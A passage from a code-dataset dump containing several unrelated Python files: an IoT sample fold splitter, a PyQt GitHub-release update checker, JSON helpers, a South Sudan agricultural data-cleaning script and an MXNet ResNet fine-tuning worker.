ilen, nlen = len(iot_k), len(not_k)\n\n for i in xrange(5):\n end_iot_curr = (i+1) * int(round(ilen * 0.2))\n end_not_curr = (i+1) * int(round(nlen * 0.2))\n if i == 4:\n end_iot_curr = ilen\n end_not_curr = nlen\n test_iot = iot_k[int(round(ilen * 0.2)) * i: end_iot_curr]\n test_not = not_k[int(round(nlen * 0.2)) * i: end_not_curr]\n train_iot = []\n for k in iot_k:\n if k not in test_iot:\n train_iot.append(k)\n train_not = []\n for k in not_k:\n if k not in test_not:\n train_not.append(k)\n\n folds.append(((train_iot + train_not), (test_iot + test_not)))\n return folds\n\n\ndef make_oracles(oracle, train, test):\n train_oracle, test_oracle = {}, {}\n for k, v in oracle.items():\n if k in train:\n train_oracle[k] = v\n if k in test:\n test_oracle[k] = v\n return train_oracle, test_oracle\n\n\ndef get_files_names():\n iot_dir = SAMPLES_IN_DIR + 'IOT/'\n not_dir = SAMPLES_IN_DIR + 'NOT/'\n iotfiles = [iot_dir + f for f in listdir(iot_dir) if isfile(join(iot_dir, f))]\n notfiles = [not_dir + f for f in listdir(not_dir) if isfile(join(not_dir, f))]\n return iotfiles + notfiles\n\n\ndef copy_files_per_oracle(oracle, infiles, pre_path):\n for k, v in oracle.items():\n name = get_dev_file_name(v)\n related_files = []\n for nm in infiles:\n if name[2:].lower() in nm.lower():\n related_files.append(nm)\n oracle[k].files = related_files\n for fl in related_files:\n out_fn = pre_path + '/' + name\n ifl = open(fl, 'r')\n ofl = open(out_fn, 'a')\n ofl.write(ifl.read())\n ifl.close()\n ofl.close()\n\n\ndef prepare_folders():\n tr_name = OUT_TRAIN\n ts_name = OUT_TEST\n for i in xrange(5):\n create_folder(OUT_MAIN)\n fold = OUT_MAIN + str(i) + '_fold/'\n create_folder(fold)\n create_folder(fold + tr_name)\n create_folder(fold + ts_name)\n create_folder(fold + tr_name + '/NOT')\n create_folder(fold + tr_name + '/IOT')\n create_folder(fold + ts_name + '/NOT')\n create_folder(fold + ts_name + '/IOT')\n return tr_name, ts_name\n\n\ndef map_samples_to_all(files):\n res = []\n for fl in files:\n #print fl\n fl = fl.replace(\"seen_samples\", \"seen_all\")\n res.append(fl)\n #print fl\n return res\n\n\ndef main():\n train_fol, test_fol = prepare_folders()\n dtl = DeviceTagsLoader(oracle_fn)\n oracle = dtl.devs\n\n folds = make_folds(oracle)\n #for e in folds:\n # print e\n\n file_names = get_files_names()\n\n for i in xrange(5):\n train, test = make_oracles(oracle, folds[i][0], folds[i][1])\n copy_files_per_oracle(train, file_names, OUT_MAIN + str(i) + '_fold/' + train_fol)\n file_names = map_samples_to_all(file_names)\n copy_files_per_oracle(test, file_names, OUT_MAIN + str(i) + '_fold/' + test_fol)\n\n\nif '__main__' == __name__:\n main()\n","sub_path":"features2folders/make_folds_w_all.py","file_name":"make_folds_w_all.py","file_ext":"py","file_size_in_byte":5266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"50096124","text":"__author__ = 'tholen'\n\nfrom UserCode.RWTH3b.cmsRunController.tools.TemplateFitTool import \\\n CRHistoWorker,\\\n CRTemplateFitTool,\\\n CRTemplateFitWorker\nfrom UserCode.RWTH3b.cmsRunController.classes.CRRootStyle import CRRootStyle\nroot_style = CRRootStyle()\n\n####\n#### Another time!\n####\nclass CREnsembleStudyWorker(CRHistoWorker):\n \"\"\"\n \"\"\"\n\n def configure(self):\n \"\"\"\n \"\"\"\n\n self.iterations = self.worker_request.iterations\n\n\n def run_procedure(self):\n \"\"\"\n \"\"\"\n\n fitter = CRTemplateFitWorker()\n fitter.lumi = self.lumi\n\n\n\n\nclass CREnsembleStudyTool(CRTemplateFitTool):\n \"\"\"\n \"\"\"\n\n def configure(self):\n self.after_every_process = False\n self.fit_worker_class = CREnsembleStudyWorker\n self.add_tokens_to_request = [\n \"iterations\"\n ]\n","sub_path":"python/cmsRunController/tools/EnsembleStudyTool.py","file_name":"EnsembleStudyTool.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"510561129","text":"\"\"\"Moduł odpowiedzialny za sprawdzanie ostatniej wersji oprogramowania\nw repozytorium GitHub i w razie konieczności uruchomienie automatycznej\naktualizacji\"\"\"\nimport json\nimport urllib.request\n\nfrom PyQt5.QtGui import QIcon\nfrom PyQt5.QtWidgets import QMessageBox, QApplication\n\n\nclass MessageBox(QMessageBox):\n\n def __init__(self, wersja):\n super().__init__()\n acceptbtn = self.addButton('Tak', self.AcceptRole)\n acceptbtn = self.standardButton(acceptbtn)\n nobtn = self.addButton('Nie', self.RejectRole)\n nobtn = self.standardButton(nobtn)\n self.setWindowIcon(QIcon('icons/cow.png'))\n self.setWindowTitle('Aktualizacja PBPZ')\n self.setIcon(QMessageBox.Information)\n self.setText('Pojawiła się nowa aktualizacja programu PBPZ ({}).\\nCzy chcesz ja teraz pobrać?'.format(wersja))\n self.setStandardButtons(acceptbtn | nobtn)\n self.show()\n\n\ndef getResponse(url):\n operUrl = urllib.request.urlopen(url)\n if operUrl.getcode() == 200:\n data = operUrl.read()\n jsonData = json.loads(data)\n else:\n print(\"Error receiving data\", operUrl.getcode())\n return jsonData\n\n\ndef showDialog(wersja=None):\n print(wersja)\n import sys\n app = QApplication(sys.argv)\n from PyQt5.QtWidgets import QStyleFactory\n app.setStyle(QStyleFactory.create('Fusion'))\n message = MessageBox(wersja)\n if message.exec() != QMessageBox.Accepted:\n print('Wybrano tak')\n import webbrowser\n webbrowser.open('https://github.com/Lioheart/Projekt_Bez_Polskich_Znakow/releases/latest')\n sys.exit(0)\n else:\n print('Wybrano nie')\n\n\n# https://api.github.com/repos/Lioheart/Projekt_Bez_Polskich_Znakow/releases/latest\nif __name__ == \"__main__\":\n jsonData = getResponse('https://api.github.com/repos/Lioheart/Projekt_Bez_Polskich_Znakow/releases/latest')\n print(jsonData['tag_name'][1:])\n","sub_path":"autoupdate.py","file_name":"autoupdate.py","file_ext":"py","file_size_in_byte":1918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"606060248","text":"import json as jn\nfrom pathlib import Path\nfrom typing import Union\n\nfrom myutils import get_path\n\n__all__ = [\n 'load_json',\n 'save_json',\n 'load_json_or_create',\n]\n\n\ndef load_json(fpath: Union[Path, str], encoding: str = 'utf-8') -> Union[dict, list, str]:\n \"\"\"Load a json file.\n\n :param fpath: str or Path\n :param encoding: str\n :return: json file contents\n \"\"\"\n\n fpath = get_path(fpath)\n\n with fpath.open(encoding=encoding) as file:\n return jn.load(file)\n\n\ndef save_json(obj: Union[dict, list, str], fpath: Union[Path, str], encoding: str = 'utf-8') -> None:\n \"\"\"Save an object to a json file.\n\n :param obj: dict or list or str\n :param fpath: str or Path\n :param encoding: str\n \"\"\"\n\n fpath = get_path(fpath)\n\n with fpath.open('w', encoding=encoding) as file:\n jn.dump(obj, file, ensure_ascii=False, indent=4)\n\n\ndef load_json_or_create(\n fpath: Union[Path, str],\n factory: type,\n encoding: str = 'utf-8',\n) -> Union[dict, list, str]:\n \"\"\"Load json, if file exists, otherwise create an object\n from the given factory.\n\n :param fpath: file path\n :param factory: default data type\n :param encoding: encoding\n :return: json file contents\n \"\"\"\n\n fpath = Path(fpath)\n\n if fpath.exists():\n return load_json(fpath, encoding)\n\n else:\n return factory()\n","sub_path":"myutils/json.py","file_name":"json.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"223335160","text":"\"\"\" Script for cleaning data for 12 month evaluation. \"\"\"\n\nimport sys\nimport re\nimport pandas as pd\nfrom glob import glob\nfrom typing import List\nfrom delphi.utils import cd\nfrom delphi.paths import data_dir\n\n\n\n\n\n\n\ndef process_climis_crop_production_data(data_dir: str):\n \"\"\" Process CliMIS crop production data \"\"\"\n\n climis_crop_production_csvs = glob(\n \"/\".join(\n [\n data_dir,\n \"Climis South Sudan Crop Production Data\",\n \"Crops_EstimatedProductionConsumptionBalance*.csv\",\n ]\n )\n )\n state_county_df = pd.read_csv(\n \"/\".join([data_dir, \"ipc_data.csv\"]), skipinitialspace=True\n )\n\n combined_records = []\n\n for f in climis_crop_production_csvs:\n year = int(f.split(\"/\")[-1].split(\"_\")[2].split(\".\")[0])\n df = pd.read_csv(f).dropna()\n for i, r in df.iterrows():\n record = {\n \"Year\": year,\n \"Month\": None,\n \"Source\": \"CliMIS\",\n \"Country\": \"South Sudan\",\n }\n region = r[\"State/County\"].strip()\n\n if region in state_county_df[\"State\"].values:\n record[\"State\"] = region\n record[\"County\"] = None\n else:\n potential_states = state_county_df.loc[\n state_county_df[\"County\"] == region\n ][\"State\"]\n if len(potential_states) != 0:\n record[\"State\"] = potential_states.iloc[0]\n else:\n record[\"State\"] = None\n record[\"County\"] = region\n\n\n for field in r.index:\n if field != \"State/County\":\n if \"Net Cereal production\" in field:\n record[\"Variable\"] = \"Net Cereal Production\"\n record[\"Value\"] = r[field]\n if field.split()[-1].startswith(\"(\"):\n record[\"Unit\"] = field.split()[-1][1:-1].lower()\n else:\n record[\"Unit\"] = None\n\n combined_records.append(record)\n\n df = pd.DataFrame(combined_records)\n return df\n\n\ndef process_fao_livestock_data(\n data_dir: str, columns: List[str]\n ) -> pd.DataFrame:\n csvfile = \"/\".join(\n [\n \"FAO Crop_Livestock Production Data\",\n \"FAOSTAT_South_Sudan_livestock_data_2014-2016.csv\",\n ]\n )\n\n fao_livestock_csv = \"/\".join([data_dir, csvfile])\n\n df = pd.read_csv(\n fao_livestock_csv, usecols=[\"Element\", \"Item\", \"Year\", \"Unit\", \"Value\"]\n )\n\n df[\"Animal\"] = df[\"Item\"].str.split(\",\").str.get(-1)\n df[\"Product\"] = df[\"Item\"].str.split(\",\").str.get(0)\n df[\"Variable\"] = df[\"Animal\"] + \" \" + df[\"Product\"] + \" \" + df[\"Element\"]\n df[\"Variable\"] = df[\"Variable\"].str.lower()\n df[\"Unit\"] = df[\"Unit\"].str.lower()\n df[\"Source\"] = \"FAO\"\n df[\"State\"] = None\n df[\"County\"] = None\n df[\"Country\"] = \"South Sudan\"\n df[\"Month\"] = None\n fao_livestock_df = df[columns]\n return fao_livestock_df\n\n\ndef process_fewsnet_data(data_dir, columns: List[str]) -> pd.DataFrame:\n \"\"\" Process IPC food security classifications by county for South Sudan. \"\"\"\n df = pd.read_csv(\"/\".join([data_dir, \"ipc_data.csv\"]))\n df[\"Unit\"] = \"IPC Phase\"\n df[\"Source\"] = \"FEWSNET\"\n df[\"Variable\"] = \"IPC Phase Classification\"\n df[\"Country\"] = \"South Sudan\"\n df.rename(str.strip, axis=\"columns\", inplace=True)\n df.rename(columns={\"IPC Phase\": \"Value\"}, inplace=True)\n df = df[columns]\n return df\n\n\ndef process_climis_livestock_data(data_dir: str):\n \"\"\" Process CliMIS livestock data. \"\"\"\n\n records = []\n climis_livestock_production_dir = \"/\".join([str(data_dir), \"Climis South Sudan Livestock Data\", \"Livestock Production\"])\n\n with cd(climis_livestock_production_dir):\n # dirs = glob(\"*\")\n # for dir in dirs:\n # with cd(dir):\n # print(\"climis_livestock_dir:\" + climis_livestock_dir)\n for filename in glob('*2017.csv'):\n # print('filename:' + filename)\n df = pd.read_csv(filename, index_col=0)\n # print(df.index)\n for column in df.columns:\n # print(column)\n record = {\n 'Year': 2017,\n 'Variable': \"Percentage of householding at least milking one of their livestocks\",\n 'County': None,\n 'Country': \"South Sudan\",\n 'Unit': '%',\n 'Month': column,\n 'Value': df.loc['Households '][column],\n 'Source': 'CliMIS'\n }\n state_without_spaces = filename.split('_')[1]\n # print(record)\n record['State'] = ' '.join(re.findall('[A-Z][^A-Z]*', state_without_spaces))\n records.append(record)\n \n climis_livestock_bodycondition_dir = \"/\".join([str(data_dir), \"Climis South Sudan Livestock Data\", \"Livestock Body Condition\"])\n with cd(climis_livestock_bodycondition_dir):\n for filename in glob('*2017.csv'):\n df = pd.read_csv(filename, index_col=0)\n for i in df.index:\n for column in df.columns:\n record = {\n 'Year': 2017,\n 'County': None,\n 'Country': \"South Sudan\",\n 'Unit': '%',\n 'Month': column,\n 'Value': df.loc[i][column],\n 'Source': 'CliMIS'\n }\n state_without_spaces = filename.split('_')[-2]\n # print(record)\n record['State'] = ' '.join(re.findall('[A-Z][^A-Z]*', state_without_spaces)) \n record['Variable'] = \"Percentage of \" + filename.split('_')[-3] + \" in body condiction of \" + i\n records.append(record)\n\n\n climis_livestock_diseases_dir = \"/\".join([str(data_dir), \"Climis South Sudan Livestock Data\", \"Livestock Diseases\"])\n with cd(climis_livestock_diseases_dir):\n for filename in glob('*2017.csv'):\n df = pd.read_csv(filename, index_col=0)\n # print(df.loc['FMD'])\n # print()\n # df.rename(str.strip, axis=\"columns\", inplace=True)\n for i, r in df.iterrows():\n # print (i)\n if(i != 'Reported ' and i != 'Vaccinated ' and i != 'Treated '):\n disease_str = i\n else:\n for column in df.columns:\n record = {\n 'Year': 2017,\n 'County': None,\n 'Country': \"South Sudan\",\n 'Unit': '%',\n 'Month': column,\n 'Value': r[column],\n 'Source': 'CliMIS'\n }\n state_without_spaces = filename.split('_')[-2]\n record['State'] = ' '.join(re.findall('[A-Z][^A-Z]*', state_without_spaces))\n record['Variable'] = \"Percentage of livestocks with disease \" + disease_str + \" is \" + i\n records.append(record)\n\n\n climis_livestock_ownership_dir = \"/\".join([str(data_dir), \"Climis South Sudan Livestock Data\", \"Livestock Ownership\"])\n with cd(climis_livestock_ownership_dir):\n for filename in glob('*2017.csv'):\n df = pd.read_csv(filename, index_col=0)\n for i, r in df.iterrows():\n if(i != 'Cattle' and i != 'Goat' and i != 'Sheep' and i != 'Poultry'):\n quantity_str = i\n else:\n for column in df.columns:\n record = {\n 'Year': 2017,\n 'County': None,\n 'Country': \"South Sudan\",\n 'Month': column,\n 'Value': r[column],\n 'Source': 'CliMIS'\n }\n state_without_spaces = filename.split('_')[-2]\n record['State'] = ' '.join(re.findall('[A-Z][^A-Z]*', state_without_spaces))\n record['Variable'] = quantity_str.replace('animal', i).replace('stock', i)\n if(quantity_str == 'Average price of animal sold (SSP)'):\n record[\"Unit\"] = '$'\n else:\n record[\"Unit\"] = None\n\n records.append(record)\n\n\n climis_livestock_loss_dir = \"/\".join([str(data_dir), \"Climis South Sudan Livestock Data\", \"Livestock Loss\"])\n with cd(climis_livestock_loss_dir):\n for filename in glob('*2017.csv'):\n df = pd.read_csv(filename, index_col=0)\n for i in df.index:\n for column in df.columns:\n record = {\n 'Year': 2017,\n 'County': None,\n 'Country': \"South Sudan\",\n 'Unit': '%',\n 'Month': column,\n 'Value': df.loc[i][column],\n 'Source': 'CliMIS'\n }\n state_without_spaces = filename.split('_')[-2]\n # print(record)\n record['State'] = ' '.join(re.findall('[A-Z][^A-Z]*', state_without_spaces)) \n record['Variable'] = \"Percentage of \" + filename.split('_')[-3] + \" suffer from \" + i\n records.append(record)\n\n climis_livestock_MarketPrices_dir = \"/\".join([str(data_dir), \"Climis South Sudan Livestock Data\", \"Livestock Market Prices\"])\n with cd(climis_livestock_MarketPrices_dir):\n for filename in glob('*2017.csv'):\n df = pd.read_csv(filename, index_col=0)\n for i, r in df.iterrows():\n for column in df.columns:\n if(column!= 'Market'):\n record = {\n 'Year': 2017,\n 'Country': \"South Sudan\",\n 'Unit': '$',\n 'Month': column,\n 'Value': r[column],\n 'Source': 'CliMIS'\n }\n state_without_spaces = filename.split('_')[-2]\n record['County'] = i\n record['State'] = ' '.join(re.findall('[A-Z][^A-Z]*', state_without_spaces)) \n record['Variable'] = \"Price of \" + filename.split('_')[-3] + \" in Market \" + r['Market']\n records.append(record)\n\n climis_livestock_migration_dir = \"/\".join([str(data_dir), \"Climis South Sudan Livestock Data\", \"Livestock Migration\"])\n with cd(climis_livestock_migration_dir):\n for filename in glob('*2017.csv'):\n df = pd.read_csv(filename, index_col=0)\n row_id = 0\n for i, r in df.iterrows():\n \n if(row_id == df.index.get_loc(\"Distance covered\") + 1):\n for column in df.columns:\n record = {\n 'Year': 2017,\n 'Variable': \"Livestock migration distance covered\",\n 'County': None,\n 'Country': \"South Sudan\",\n 'Unit': 'mile',\n 'Month': column,\n 'Value': r[column],\n 'Source': 'CliMIS'\n }\n state_without_spaces = filename.split('_')[-2]\n record['State'] = ' '.join(re.findall('[A-Z][^A-Z]*', state_without_spaces))\n records.append(record)\n\n if(row_id == df.index.get_loc(\"Proportion of livestock that migrated\") + 1):\n for column in df.columns:\n record = {\n 'Year': 2017,\n 'Variable': \"Proportion of livestock that migrated\",\n 'County': None,\n 'Country': \"South Sudan\",\n 'Unit': '%',\n 'Month': column,\n 'Value': r[column],\n 'Source': 'CliMIS'\n }\n state_without_spaces = filename.split('_')[-2]\n record['State'] = ' '.join(re.findall('[A-Z][^A-Z]*', state_without_spaces))\n records.append(record)\n\n if(row_id == df.index.get_loc(\" Migration normal at this time of the year\") + 1):\n for column in df.columns:\n record = {\n 'Year': 2017,\n 'Variable': \"Proportion of livestock that migrated normally at this time of the year\",\n 'County': None,\n 'Country': \"South Sudan\",\n 'Unit': '%',\n 'Month': column,\n 'Value': r[column],\n 'Source': 'CliMIS'\n }\n state_without_spaces = filename.split('_')[-2]\n record['State'] = ' '.join(re.findall('[A-Z][^A-Z]*', state_without_spaces))\n records.append(record)\n\n if(row_id == df.index.get_loc(\" Migration normal at this time of the year\") + 2):\n for column in df.columns:\n record = {\n 'Year': 2017,\n 'Variable': \"Proportion of livestock that migrated abnormally at this time of the year\",\n 'County': None,\n 'Country': \"South Sudan\",\n 'Unit': '%',\n 'Month': column,\n 'Value': r[column],\n 'Source': 'CliMIS'\n }\n state_without_spaces = filename.split('_')[-2]\n record['State'] = ' '.join(re.findall('[A-Z][^A-Z]*', state_without_spaces))\n records.append(record)\n\n if(row_id == df.index.get_loc(\" Duration in months when the migrated animals are expected to be back after \") + 1):\n for column in df.columns:\n record = {\n 'Year': 2017,\n 'Variable': \"Duration in months when the migrated animals are expected to be back after\",\n 'County': None,\n 'Country': \"South Sudan\",\n 'Unit': \"month\",\n 'Month': column,\n 'Value': r[column],\n 'Source': 'CliMIS'\n }\n state_without_spaces = filename.split('_')[-2]\n record['State'] = ' '.join(re.findall('[A-Z][^A-Z]*', state_without_spaces))\n records.append(record)\n\n if(i == 'Migration In ' or i == 'Migration Out' or i == 'No Migration'):\n for column in df.columns:\n record = {\n 'Year': 2017,\n 'County': None,\n 'Country': \"South Sudan\",\n 'Unit': '%',\n 'Month': column,\n 'Value': r[column],\n 'Source': 'CliMIS'\n }\n state_without_spaces = filename.split('_')[-2]\n record['State'] = ' '.join(re.findall('[A-Z][^A-Z]*', state_without_spaces))\n record['Variable'] = \"Livestocks Percentage of \" + i\n records.append(record)\n \n\n if(i == 'Pasture' or i == 'Water' or i == 'Conflict / Insecurity' or i == 'Disease' or i == 'Wild Conflict' or i == 'Others'):\n for column in df.columns:\n record = {\n 'Year': 2017,\n 'County': None,\n 'Country': \"South Sudan\",\n 'Unit': '%',\n 'Month': column,\n 'Value': r[column],\n 'Source': 'CliMIS'\n }\n state_without_spaces = filename.split('_')[-2]\n record['State'] = ' '.join(re.findall('[A-Z][^A-Z]*', state_without_spaces))\n record['Variable'] = \"Percentage of livestock migration due to \" + i\n records.append(record)\n\n row_id += 1\n\n\n climis_livestock_data_df = pd.DataFrame(records)\n # print(climis_livestock_data_df)\n return climis_livestock_data_df\n\ndef create_combined_table(data_dir: str, columns: List[str]) -> pd.DataFrame:\n climis_crop_production_df = process_climis_crop_production_data(data_dir)\n fao_livestock_df = process_fao_livestock_data(data_dir, columns)\n ipc_df = process_fewsnet_data(data_dir, columns)\n climis_livestock_data_df = process_climis_livestock_data(data_dir)\n\n df = pd.concat(\n [climis_crop_production_df, fao_livestock_df, ipc_df, climis_livestock_data_df], sort=True\n )\n\n return df[columns]\n\n\nif __name__ == \"__main__\":\n columns = [\n \"Variable\",\n \"Year\",\n \"Value\",\n \"Unit\",\n \"Source\",\n \"State\",\n \"County\",\n \"Country\",\n ]\n\n data_dir = str(data_dir / \"evaluations\" / \"12_month\")\n combined_table = create_combined_table(data_dir, columns)\n combined_table.to_csv(\"combined_table.csv\", sep=\"|\", index=False)\n","sub_path":"scripts/evaluations/12_month_evaluation.py","file_name":"12_month_evaluation.py","file_ext":"py","file_size_in_byte":18255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"220106029","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nimport json\nimport sys\nimport traceback\nimport signal\nimport mxnet as mx\n\nfrom ava.params import params\nfrom ava.log.logger import logger\nfrom ava.monitor import mxnet as mxnet_monitor\nfrom ava.train import base as train\nfrom ava.utils.model import mxnet as model_utils\nfrom ava.utils import utils\n\nFIT_KWARGS_KEYS = (\"eval_metric\", \"epoch_end_callback\", \"batch_end_callback\",\n \"kvstore\", \"optimizer\", \"optimizer_params\", \"num_epoch\",\n \"monitor\")\nCROP_CHANNELS = 3\n\n\nclass MXNetTrainingWorker(object):\n\n def __init__(self):\n self.train_ins = None\n self.train_config = {}\n self.solver_config = {}\n self.train_data = None\n self.val_data = None\n self.mod = None\n\n def prepare_train_config(self):\n \"\"\"配置训练参数\"\"\"\n\n # AVA-SDK 获取训练参数\n \"\"\"\n 1) 获取所有配置 example\n param_dict = params.get_all()\n value1 = param_dict[\"key1\"]\n 2) 获取某项value\n value1 = params.get_value(\"key1\", default=1)\n \"\"\"\n snapshot_interval_epochs = params.get_value(\n \"snapshot_interval_epochs\", default=1)\n max_epochs = params.get_value(\"max_epochs\", default=3)\n rand_crop = params.get_value(\n \"rand_crop\", default=True)\n rand_mirror = params.get_value(\n \"rand_mirror\", default=True)\n batch_size, actual_batch_size, val_batch_size = utils.get_batch_size()\n\n batch_size = params.get_value(\"batchSize\", default=8)\n val_batch_size = params.get_value(\"valBatchSize\", default=batch_size)\n use_gpu, cores = utils.get_cores()\n logger.info(\"Cores GPU=%s, count=%d\", use_gpu, cores)\n actual_batch_size = batch_size if not use_gpu else batch_size * cores\n if use_gpu:\n val_batch_size *= cores\n\n # USING the trainning batch size as valadition batch size\n val_batch_size = actual_batch_size\n # crop_w, crop_h = utils.get_crop_size()\n # 根据模型的输入要求选择 crop_size\n crop_w = params.get_value(\"crop_w\")\n crop_h = params.get_value(\"crop_h\")\n\n # 添加监控\n snapshot_prefix = self.train_ins.get_snapshot_base_path() + \"/snapshot\"\n kv_store = \"device\"\n kv = mx.kvstore.create(kv_store)\n '''\n rank = int(kv.rank)\n if rank > 0:\n snapshot_prefix += \"-%s\" % rank\n '''\n\n batch_freq = 10 # 打印/上报指标的 batch 粒度\n batch_of_epoch = utils.ceil_by_level(\n float(utils.get_sampleset_num() / actual_batch_size))\n\n # AVA-SDK mxnet monitor callback 初始化\n batch_end_cb = self.train_ins.get_monitor_callback(\n \"mxnet\",\n batch_size=actual_batch_size,\n batch_freq=batch_freq)\n epoch_end_cb = [\n # mxnet default epoch callback\n mx.callback.do_checkpoint(\n snapshot_prefix, snapshot_interval_epochs),\n self.train_ins.get_epoch_end_callback(\n \"mxnet\", batch_of_epoch=batch_of_epoch, epoch_interval=snapshot_interval_epochs, other_files=[])\n ]\n\n # 训练参数,用户可以自行配置\n self.train_config = {\n \"input_data_shape\": (CROP_CHANNELS, crop_h, crop_w),\n \"rand_crop\": rand_crop,\n \"rand_mirror\": rand_mirror,\n \"batch_size\": batch_size,\n \"actual_batch_size\": actual_batch_size,\n \"val_batch_size\": val_batch_size,\n # fit_args\n \"eval_metric\": mxnet_monitor.full_mxnet_metrics(), # AVA-SDK 获取mxnet metric 列表\n \"epoch_end_callback\": epoch_end_cb,\n \"batch_end_callback\": batch_end_cb,\n \"kvstore\": kv,\n \"num_epoch\": max_epochs,\n }\n\n def prepare_solver_config(self):\n use_gpu, cores = utils.get_cores()\n gpu_counts = cores if use_gpu else 0\n batch_size, actual_batch_size, val_batch_size = utils.get_batch_size()\n\n optimizer_params = {\n \"momentum\": params.get_value(\"momentum\", default=0.9),\n \"wd\": params.get_value(\"wd\", default=0.0005),\n \"learning_rate\": params.get_value(\"learning_rate\", default=0.01),\n \"lr_scheduler\": mx.lr_scheduler.FactorScheduler(2000, factor=0.0001),\n }\n self.solver_config = {\n \"gpu_counts\": gpu_counts,\n # fit_args\n \"optimizer\": \"SGD\",\n \"optimizer_params\": optimizer_params,\n }\n\n def prepare_sampleset_data(self):\n \"\"\"load sampleset data\n \"\"\"\n\n # ava sdk 提供默认的数据集路径,如果用户需要读取其他地方的数据集,可自行配置路径\n train_data_path = self.train_ins.get_trainset_base_path() + \"/cache/data.rec\"\n self.train_data = mx.io.ImageRecordIter(\n path_imgrec=train_data_path,\n batch_size=self.train_config.get(\"actual_batch_size\"),\n data_shape=self.train_config.get(\"input_data_shape\"),\n shuffle=True,\n rand_crop=self.train_config.get(\"rand_crop\"),\n rand_mirror=self.train_config.get(\"rand_mirror\"))\n\n val_data_path = self.train_ins.get_valset_base_path() + \"/cache/data.rec\"\n if os.path.exists(val_data_path):\n self.val_data = mx.io.ImageRecordIter(\n path_imgrec=val_data_path,\n batch_size=self.train_config.get(\"val_batch_size\"),\n data_shape=self.train_config.get(\"input_data_shape\"))\n else:\n self.val_data = None\n\n def prepare_model(self):\n \"\"\"load 网络模型,(更新输出层)\n \"\"\"\n # 需要更新模型输出层种类数目的场景,用户自行决定模型文件的路径,非必要场景\n # 用户可以直接使用训练框架来读取模型\n # 替换成自己需要的模型名以及参数名 Riheng 2018/02/23\n origin_model_path = self.train_ins.get_model_base_path() + \"/resnet-50-symbol.json\"\n weight_file_path = self.train_ins.get_model_base_path() + \"/resnet-50-0000.params\"\n fixed_model_path = self.train_ins.get_model_base_path() + \"/fixed_resnet-50-symbol.json\"\n\n # AVA-SDK 获取数据集类型数 && 更新网络模型输出层\n output_layer_num = utils.get_sampleset_class_num()\n old_output_layer_name = model_utils.update_model_output_num(\n origin_model_path, fixed_model_path, output_layer_num)\n\n sym = mx.symbol.load(fixed_model_path)\n gpu_count = self.solver_config.get('gpu_counts', 0)\n ctx = [mx.cpu()] if gpu_count == 0 else [\n mx.gpu(i) for i in xrange(gpu_count)\n ]\n mod = mx.mod.Module(symbol=sym, context=ctx)\n\n mod.bind(data_shapes=self.train_data.provide_data,\n label_shapes=self.train_data.provide_label)\n\n # 默认权值初始化方式\n mod.init_params(initializer=mx.init.Xavier(rnd_type='gaussian',\n factor_type=\"in\",\n magnitude=2))\n # AVA-SDK 在替换网络输出层的场景下读取权重参数\n arg_params, aux_params = model_utils.load_model_params(\n weight_file_path, old_output_layer_name)\n if arg_params:\n logger.info(\"set pretrained weights\")\n mod.set_params(arg_params, aux_params, allow_missing=True)\n\n self.mod = mod\n\n def get_fine_tune_model(self, symbol, arg_params, num_hidden, layer_name='flatten0'):\n \"\"\"\n symbol: the pretrained network symbol\n arg_params: the argument parameters of the pretrained model\n num_hidden: tNumber of hidden nodes of the output.\n layer_name: the layer name before the last fully-connected layer\n \"\"\"\n all_layers = symbol.get_internals()\n net = all_layers[layer_name+'_output']\n net = mx.symbol.FullyConnected(data=net, num_hidden=num_hidden, name='fc1')\n net = mx.symbol.SoftmaxOutput(data=net, name='softmax')\n new_args = dict({k:arg_params[k] for k in arg_params if 'fc1' not in k})\n return (net, new_args)\n\n def prepare_model_riheng(self):\n '''load 网络模型,(更新输出层)\n '''\n sym, arg_params, aux_params = mx.model.load_checkpoint('/workspace/model/resnet-50', 0)\n num_hidden = 10\n (new_sym, new_args) = self.get_fine_tune_model(sym, arg_params, num_hidden)\n\n # get information of ctx\n gpu_count = self.solver_config.get('gpu_counts', 0)\n ctx = [mx.cpu()] if gpu_count == 0 else [\n mx.gpu(i) for i in xrange(gpu_count)\n ]\n\n mod = mx.mod.Module(symbol=new_sym, context=ctx)\n mod.bind(data_shapes=self.train_data.provide_data,\n label_shapes=self.train_data.provide_label)\n\n logger.info(\"set pretrained weights\")\n mod.set_params(new_args, aux_params, allow_missing=True)\n self.mod = mod\n\n def start_new_training(self):\n try:\n # 绑定信号,如果是接收到信号,表示用户自己选择退出训练实例\n # 训练实例状态为正常结束\n SUPPORTED_SIGNALS = (signal.SIGINT, signal.SIGTERM,)\n for signum in SUPPORTED_SIGNALS:\n try:\n signal.signal(signum, self.signal_handler)\n logger.info(\"Bind signal '%s' success to %s\",\n signum, self.signal_handler)\n except Exception as identifier:\n logger.warning(\n \"Bind signal '%s' failed, err: %s\", signum, identifier)\n\n # AVA-SDK 初始化一个训练实例\n self.train_ins = train.TrainInstance()\n\n logger.info(\"start new tarining, training_ins_id: %s\",\n self.train_ins.get_training_ins_id())\n\n logger.info(\"prepare_train_config\")\n self.prepare_train_config()\n logger.info(\"prepare_solver_config\")\n self.prepare_solver_config()\n logger.info(\"prepare_sampleset_config\")\n self.prepare_sampleset_data()\n logger.info(\"prepare_model\")\n #self.prepare_model()\n self.prepare_model_riheng()\n\n opts = self.train_config\n opts.update(self.solver_config)\n fit_args = {k: opts.get(k) for k in FIT_KWARGS_KEYS}\n logger.info(\"fit args: %s\" % fit_args)\n self.mod.fit(self.train_data,\n eval_data=self.val_data,\n initializer=mx.init.Xavier(rnd_type='gaussian', factor_type=\"in\", magnitude=2),\n **fit_args)\n\n logger.info(\"training finish\")\n err_msg = \"\"\n except Exception as err:\n err_msg = \"training failed, err: %s\" % (err)\n logger.info(err_msg)\n traceback.print_exc(file=sys.stderr)\n\n self.clean_up(err_msg=err_msg)\n\n def clean_up(self, err_msg=\"\"):\n # AVA-SDK 实例结束,需要调用 done,完成状态上报以及清理工作\n if self.train_ins == None:\n return\n 